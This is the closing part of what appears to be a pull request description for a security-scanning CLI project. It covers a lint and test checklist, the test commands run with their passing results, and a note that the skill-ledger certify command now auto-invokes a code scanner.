- [x] I have updated the documentation accordingly
- [ ] For `cosh`: Lint passes, type check passes, and tests pass
- [ ] For `sec-core` (Rust): `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [x] For `sec-core` (Python): Ruff format and pytest pass
- [ ] For `skill`: Skill directory structure is valid and shell scripts pass syntax check
- [ ] For `sight`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [ ] For `tokenless`: `cargo clippy -- -D warnings` and `cargo fmt --check` pass
- [x] Lock files are up to date (`package-lock.json` / `Cargo.lock`)

## Testing

- `make python-code-pretty` (second run left `164 files left unchanged`)
- `uv run --project agent-sec-cli ruff check --config agent-sec-cli/pyproject.toml agent-sec-cli/src/agent_sec_cli/skill_ledger/scanner/skill_code_scanner.py tests/unit-test/skill_ledger/test_scanner.py` (`All checks passed!`)
- `PYTHONPATH=agent-sec-cli/src agent-sec-cli/.venv/bin/python -m pytest tests/unit-test/skill_ledger tests/integration-test/skill-ledger/test_skill_ledger_integration.py -q` (`142 passed, 2 subtests passed`)
- `make test-python-coverage` (`1799 passed, 2 skipped, 2 subtests passed`; total coverage 78%, new adapter 89%)

## Additional Notes

`skill-ledger certify` without `--findings` now auto-invokes enabled non-skill scanners. With the default configuration, this records a `skill-code-scanner` scan entry instead of leaving auto-invoke as a no-op.
